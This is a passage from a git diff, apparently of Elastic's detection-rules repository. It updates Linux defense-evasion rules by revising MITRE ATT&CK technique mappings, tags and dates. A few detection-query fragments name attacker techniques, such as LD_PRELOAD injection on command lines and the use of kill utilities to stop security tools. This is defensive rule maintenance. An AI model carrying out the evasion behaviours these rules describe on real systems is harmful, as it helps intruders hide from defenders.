Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml index 1ac5aa2f508..b3d9a7b222f 100644 --- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml +++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,45 +126,30 @@ sequence by host.id, process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_journalctl_clear_logs.toml b/rules/linux/defense_evasion_journalctl_clear_logs.toml index 093b7354d19..aa909745f68 100644 --- a/rules/linux/defense_evasion_journalctl_clear_logs.toml +++ b/rules/linux/defense_evasion_journalctl_clear_logs.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,16 +117,6 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml index b2f955b40de..8a9075839fa 100644 --- a/rules/linux/defense_evasion_kernel_module_removal.toml +++ b/rules/linux/defense_evasion_kernel_module_removal.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -135,21 +135,3 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_kill_command_executed.toml b/rules/linux/defense_evasion_kill_command_executed.toml index 68a5e17a6e7..bc14d0952b7 100644 --- a/rules/linux/defense_evasion_kill_command_executed.toml +++ b/rules/linux/defense_evasion_kill_command_executed.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,49 +103,20 @@ process.name:(kill or pkill or killall) and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - -[[rule.threat.technique]] -name = "Impair Defenses" id = "T1562" +name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" -id = "T1562.006" -reference = "https://attack.mitre.org/techniques/T1562/006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/linux/defense_evasion_kthreadd_masquerading.toml b/rules/linux/defense_evasion_kthreadd_masquerading.toml index 847734d3990..bac0dbe6c01 100644 --- a/rules/linux/defense_evasion_kthreadd_masquerading.toml +++ b/rules/linux/defense_evasion_kthreadd_masquerading.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,14 +112,9 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.004" -name = "Masquerade Task or Service" -reference = "https://attack.mitre.org/techniques/T1036/004/" - -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_ld_preload_cmdline.toml b/rules/linux/defense_evasion_ld_preload_cmdline.toml index 3ac9270442c..5b6c4da06bc 100644 --- a/rules/linux/defense_evasion_ld_preload_cmdline.toml +++ b/rules/linux/defense_evasion_ld_preload_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -111,57 +102,20 @@ process.args:-c and process.command_line:(*LD_LIBRARY_PATH=* or *LD_PRELOAD=*) [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" - - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Privilege Escalation" - id = "TA0004" - reference = "https://attack.mitre.org/tactics/TA0004/" - - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name", "process.command_line", "host.id"] diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/defense_evasion_ld_so_creation.toml index 8559b7e0144..fcf1c7d2429 100644 --- a/rules/linux/defense_evasion_ld_so_creation.toml +++ b/rules/linux/defense_evasion_ld_so_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,18 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -119,37 +108,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" diff --git a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml index 14c9ecdfc1d..1f605570a16 100644 --- a/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml +++ b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.parent.entity_id with maxspan=3s @@ -120,45 +112,12 @@ sequence by process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" - - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml index 105dced6160..6be08ce102a 100644 --- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml +++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,21 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Discovery", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -134,11 +120,6 @@ id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" @@ -148,16 +129,11 @@ reference = "https://attack.mitre.org/tactics/TA0005/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml index f68521c8f2e..6da26421c09 100644 --- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml +++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -148,11 +148,6 @@ id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_potential_proot_exploits.toml b/rules/linux/defense_evasion_potential_proot_exploits.toml index 1761b636315..ba241949298 100644 --- a/rules/linux/defense_evasion_potential_proot_exploits.toml +++ b/rules/linux/defense_evasion_potential_proot_exploits.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,17 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,11 +101,24 @@ process.parent.name == "proot" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_prctl_process_name_tampering.toml b/rules/linux/defense_evasion_prctl_process_name_tampering.toml index 12d0ba4e5fe..914dd6c4c6f 100644 --- a/rules/linux/defense_evasion_prctl_process_name_tampering.toml +++ b/rules/linux/defense_evasion_prctl_process_name_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +id = "T1036.011" +name = "Overwrite Process Arguments" +reference = "https://attack.mitre.org/techniques/T1036/011/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml index 42658fe2b44..abe2549a743 100644 --- a/rules/linux/defense_evasion_rename_esxi_files.toml +++ b/rules/linux/defense_evasion_rename_esxi_files.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,16 +103,21 @@ VMware ESXi files are critical for virtual machine operations, storing configura framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[[rule.threat.technique]] +id = "T1491" +name = "Defacement" +reference = "https://attack.mitre.org/techniques/T1491/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1491.001" +name = "Internal Defacement" +reference = "https://attack.mitre.org/techniques/T1491/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_ssl_certificate_deletion.toml b/rules/linux/defense_evasion_ssl_certificate_deletion.toml index d5ec0c2be7b..2254deba1ee 100644 --- a/rules/linux/defense_evasion_ssl_certificate_deletion.toml +++ b/rules/linux/defense_evasion_ssl_certificate_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,16 +105,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml index 215cc1c7e9e..efc5b4ccb61 100644 --- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml +++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,9 +84,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml index 33accceabc2..b5156549894 100644 --- a/rules/linux/defense_evasion_suspicious_path_mounted.toml +++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml index 5f5aad743d2..daf5a725550 100644 --- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml +++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,26 +90,20 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or / [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique]] - name = "Indirect Command Execution" - id = "T1202" - reference = "https://attack.mitre.org/techniques/T1202/" - - [[rule.threat.technique]] - name = "Hide Artifacts" - id = "T1564" - reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.name"] diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml index b1e0758e17c..fd5e8cd4af8 100644 --- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml +++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,25 +105,15 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -name = "Impair Defenses" id = "T1562" +name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" -id = "T1562.006" -reference = "https://attack.mitre.org/techniques/T1562/006/" - -[[rule.threat.technique]] -name = "Subvert Trust Controls" -id = "T1553" -reference = "https://attack.mitre.org/techniques/T1553/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index fb5343a26bc..bc08faf6393 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = 